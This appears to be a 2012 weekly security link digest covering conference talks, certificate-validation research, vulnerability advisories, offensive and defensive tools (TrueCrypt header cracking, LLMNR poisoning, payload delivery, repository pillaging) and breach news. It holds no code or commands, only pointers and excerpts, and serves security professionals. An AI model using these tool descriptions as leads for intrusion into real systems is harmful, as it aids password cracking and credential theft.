Week 43 in Review – 2012

Event Related

• ToorCon
  • ToorChat – github.com
    A Chat Program for use with the ToorCon 2013 badge.
  • ToorCon Presentation – brightmoonsecurity.com
    Thanks for attending my Toorcon Presentation. Below are links to my presentation and the references I mentioned in the talk. Please let me know if you have any recommendations on course materials.
  • ToorCon Presentation – ciphersuites.com
    This is the landing page for the research done by tecknicaltom for the ToorCon presentation by tecknicaltom titled HTTPS in the Real World: Screw-ups, Trends, and Outliers.
• Hack.lu 2012
  • Hack.lu 2012 Wrap-Up Day #1 – blog.rootshell.be
    Last week, I was in Luxembourg for my day-to-day job and this week, I’m back for more fun (and some business too . It’s time for a new edition of hack.lu. This is already myfourth edition, time flies!
  • Hack.lu 2012 Wrap-Up Day #2 – blog.rootshell.be
    Here we go for the wrap-up of the second day! After a short night and some 0xC0FFEE, the schedule started with a keynote by Sharon Conheady about the “future of social engineering“. Sharon is a specialist in social extreme engineering (read: with physical access to facilities).
  • Hack.lu 2012 Wrap-Up Day #3 – blog.rootshell.be
    The 2012 edition of hack.lu is already over for a few minutes. Here is my wrap-up posted just before driving back to $HOME! Yesterday, we had a nice dinner with Belgian friends.
• RuxCon Breakpoint
  • RuxCon Breakpoint Slides – ruxconbreakpoint.com
    Check out the presentation of each speaker for the RuxCon Breakpoint.
  • RuxCon Slides – ruxcon.org.au
    Check out the presentation of each speaker for the RuxCon.
• SkyDogCon 2012 Videos – irongeek.com
  Here are the videos from SkyDogCon. Thanks to all of the SkyDogCon crew, especially SeeBlind for running the cameras.

Resources

• SSL Certficates
  • Everything You’ve Always Wanted to Know About Certificate Validation with OpenSSL – isecpartners.com
    Applications that need to securely communicate with a remote server commonly rely on the TLS
    1protocol. Various libraries are available for developers who want to leverage this protocol — one of the most popular being
    OpenSSL.
  • The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software – cs.utexas.edu
    SSL (Secure Sockets Layer) is the de facto standard for secure Internet communications. Security of SSL connections against an active network attacker depends on correctly validating public-key certificates presented when the connection is established.
  • The most dangerous code in the world: validating SSL Certficates in non-browser software
    SSL (Secure Sockets Layer) is the de facto standard for secure Internet communications. Security of SSL connections against an active network attacker depends on correctly validating public-key certificates presented when the connection is established.
• HP/H3C and Huawei SNMP Weak Access to Critical Data – grutztopia.jingojango.net
  HP/H3C and Huawei networking equipment suffers from a serious weakness in regards to their handling of Systems Network Management Protocol (SNMP) requests for protected h3c-user.mib and hh3c-user.mib objects.

Techniques

• Introducing the USB Stick of Death – j00ru.vexillium.org
  Several months back we have been playing with different file systems on various system platforms, examining the security posture and robustness of numerous device drivers’ implementations.
• AXFR for DNSSEC: DNSSEC Walker – room362.com
  DNSSEC Walker traverses a domain’s DNSSEC records to locate it’s regular DNS records.
• Testing Applications for DLL Preloading Vulnerabilities – netspi.com
  DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application.
• Hacking KeyLoggers – blog.opensecurityresearch.com
  Our forensics investigations often result in us having to identify odd devices left over by attackers. So when we recently had to investigate a suspicious USB device connected between the keyboard and USB port on the rear chassis of a senior executive’s desktop computer, my job (I chose to accept it) was to discover what the device was and if it was evil.
• Demystifying Dot NET Reverse Engineering, Part 1: Big Introduction – resources.infosecinstitute.com
  This, and all upcoming parts, are made with a strict and pure educational purpose just to gain insights into dot NET programs. What you’re going to do with this and all upcoming parts is your own responsibility. I will not be held responsible for your eventual action and use of this.
• Hacking PDF: util.printf() Buffer Overflow: Part 1 – resources.infosecinstitute.com
  One of the first things we need to do is to remove the PDF Reader we currently have installed and reinstall the old version of PDF Reader.
• Strategies to Mitigate Targeted Cyber Instructions – dsd.gov.au
  Australian computer networks are being targeted by adversaries seeking access to sensitive information.
• Fuzzing the Iceberg: Finding Vulnerabilities in Third Party Software – securetheinterior.blogspot.de
  Since 2005, the number of vulnerabilities revealed annually has been generally consistent, between 7,000-9,000
  [1].
• Creating an Offline-Version of O2 – diniscruz.blogspot.com
  If you are going to use O2 in a location without a good network connection or if you have some corporate proxy that prevents the download of some of O2 external dependencies (that happen on first use/compile of some O2 Scripts), the best thing to do is to create an Offline Copy of O2.

Tools

• TrueCrypt Head
  • TCHead – TrueCrypt Password Cracking Tool – toolsyard.thehackernews.com
    TCHead is software that decrypts and verifies TrueCrypt headers. TCHead supports all the current hashes, individual ciphers, standard volume headers, hidden volume headers and system drive encrypted headers (preboot authentication).
  • Attacking TrueCrypt – h-online.com
    The open source TrueCrypt disk encryption tool is considered the to be the software of choice for systematically encrypting data. It is able to encrypt individual drives, such as USB Flash drives, and even entire hard drives. A small utility called TCHead is, however, able to tackle data encrypted using TrueCrypt.
• Atlasutils Release – atlas.r4780y.com
  Latest atlasutils downloadable here.
• Introducing Responder-1.0 – blog.spiderlabs.com
  Responder is a multi threaded tool that answers to IPv4 LLMNR (Link-local Multicast Name Resolution) and Netbios Name Service (NBT-NS) queries.
• DVCS-Pillage – github.com
  I thought it would be useful to automate some other techniques I found to extract code, configs and other information from a git,hg, and bzr repo’s identified in a web root that was not 100% cloneable. Each script extracts as much knowledge about the repo as possible through predictable file names and known object hashes, etc.
• Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1) – cert.org
  In the past, our two fuzzing frameworks had been based on related code but developed separately. Beginning with the release of BFF 2.5 in April and FOE 2.0 in July, we began to converge these code bases back together.
• IDAscope a great SwissKnife for reversers – marcoramilli.blogspot.com
  Today I’d like to introduce a great tool made by Daniel Plohmann and Alexander Hanel from University of Bohn and Fraunhofer FKIE called IDAscope. IDAscope is an IDAPro extension for easier (malware) reverse engineering: it offers three main functionalities.
• Kautilya 0.4.0 – reliable payload execution and more – labofapenetrationtester.blogspot.com
  Kautilya 0.4.0 would be more reliable than ever (at least I intended so). There has been a major change in the architecture thanks to this awesome post by the Offensive Security guys. Large parts of code have been copied from the Peensy standalone.
• NOWASP (Mutillidae) – sourceforge.net
  NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiast to pen-test a web application.

Vendor/Software Patches

• SE-2012-01] Challenging Oracle (in a different way) – seclists.org
  On Oct 16, 2012, Oracle corporation released Java SE Critical Patch Update [1], which incorporated fixes for 19 security issues that we
  reported to the company earlier this year. This included a fix for a serious Issue 32 [2] found shortly after the out-of-band patch was
  released by Oracle on Aug 30, 2012.

Vulnerabilities

• Security Flaws in the TSA Pre-check System and the Boarding Pass Check System – puckinflight.wordpress.com
  The problem is, the passenger and flight information encoded in barcode is not encrypted in any way. Using a web site I decoded my boarding pass for my upcoming trip.
• Broadcom DoS on BCM4325 and BCM4329 devices – coresecurity.com
  This vulnerability was discovered by Andres Blanco. The Proof of Concept and additional research was made by Andres Blanco and Matias Eissler from Core Impact team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

Other News

• Research Shows Serious Problems With Android App SSL Implementations – threatpost.com
  There are thousands of apps in the Google Play mobile market that contain serious mistakes in the way that SSL/TLS is implemented, leaving them vulnerable to man-in-the-middle attacks that could compromise sensitive user data such as banking credentials, credit card numbers and other information.
• Spam with .gov URLs – symantec.com
  Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
• Researchers find not all EC2 instances are created equal – theregister.co.uk
  Researchers from Deutsch Telekom Laboratories and Finland’s Aalto University have claimed it is possible to detect the CPUs of servers powering at Amazon Web Services’ (AWS’) Elastic Compute Cloud (EC2), and that the fact the cloudy giant uses different kit in different places means users can select more powerful servers at the same cost charged for lesser hardware.
• Researchers Find Flaws In Android Apps That Leave Millions Vulnerable To Password, Online Banking Credentials, And Email Data Theft – forbes.com
  Android apps that have been downloaded by as many as 185 million users have been found to contain vulnerabilities that can expose passwords, emails, and even online banking credentials.
• Hackers steal customer data from Barnes & Noble keypads – news.cnet.com
  Hackers broke into keypads at more than 60 Barnes & Noble bookstores and made off with the credit card information for customers who shopped at the stores as recently as last month.
• How a Google Headhunter’s E-Mail Unraveled a Massive Net Security Hole – wired.com
  It was a strange e-mail, coming from a job recruiter at Google, asking Zachary Harris if he was interested in a position as a site-reliability engineer.
• Sony faces setback as hackers release PlayStation 3 decryption keys – arstechnica.com
  Sony faced a setback in its campaign to control what software can run on its PlayStation 3 after hackers published one of the cryptographic keys that forms the core of the security scheme locking down the game console.
• Jailbreaking now legal under DMCA for smartphones, but not tablets – arstechnica.com
  The Digital Millennium Copyright makes it illegal to “circumvent” digital rights management schemes. But when Congress passed the DMCA in 1998, it gave the Librarian of Congress the power to grant exemptions. The latest batch of exemptions, which will be in force for three years, were announced on Thursday.
• Leading Tech Companies Form Cyber Security Research Alliance – xbitlabs.com
  Advanced Micro Devices, Honeywell, Intel Corp., Lockheed Martin and RSA/EMC announced the creation of the Cyber Security Research Alliance (CSRA), a private, non-profit research consortium formed in response to the growing need for increased public-private collaboration to address complex problems in cyber security.
• New Project Basecamp Tools for CoDeSys, 200+ Vendors Affected – digitalbond.com
  Reid Wightman provided one last set of Project Basecamp tools before leaving for ioActive. This latest release are two tools for PLC’s running the CoDeSys ladder logic runtime, which is a list of 261 vendors.
• DHS realigns cyber office into five divisions – federalnewsradio.com
  The Homeland Security Department’s Office of Cybersecurity and Communications is expanding to five divisions from three and creating a performance-management office.
• How do penetration testers work in teams? – reddit.com
  Like the title says, how do you put the “team” in penetration testing team? What different roles/tasks can different testers do to cooperate in a pentest? What are the benefits to having more people besides simply having a broader skill-set on hand? Hollywood always shows one guy in the van, another at the switchboard in the basement, one in the elevator shaft, and the two most attractive people doing SE on the main floor. How’s it work in real life?
• South Carolina reveals massive data breach of Social Security Numbers, credit cards – computerworld. com
  Approximately 3.6 million Social Security numbers and 387,000 credit and debit card numbers belonging to South Carolina taxpayers were exposed after a server at the state’s Department of Revenue was breached by an international hacker, state officials said Friday.
• Cash-Strapped States Under Siege – darkreading.com
  Most state chief information security officers say that a lack of funding is the biggest challenge in their cybersecurity efforts, and 70 percent of state CISOs have reported a data breach this year.